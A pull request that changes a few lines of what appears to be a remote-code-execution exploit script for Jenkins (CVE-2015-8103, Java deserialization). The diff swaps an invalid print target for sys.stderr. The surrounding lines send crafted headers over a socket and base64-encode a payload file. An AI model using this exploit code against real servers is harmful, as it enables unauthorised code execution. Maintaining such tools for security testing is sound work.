### PR TITLE
Python 2 died 650 days ago on 1/1/2020

### DIFF
--- a/rce/jenkins_rce_cve-2015-8103_deser.py
+++ b/rce/jenkins_rce_cve-2015-8103_deser.py
@@ -35,10 +35,10 @@ print('sending "%s"' % headers)
 sock.send(headers)
 
 data = sock.recv(1024)
-print('received "%s"' % data, file=apache/superset)
+print('received "%s"' % data, file=sys.stderr)
 
 #data = sock.recv(1024)
-#print('received "%s"' % data, file=apache/superset)
+#print('received "%s"' % data, file=sys.stderr)
 
 payloadObj = open(sys.argv[3],'rb').read()
 payload_b64 = base64.b64encode(payloadObj)


### PR DESCRIPTION
Python 2 died 650 days ago on 1/1/2020 so it might no longer be installed on newer operating systems.

print() is a function in Python 3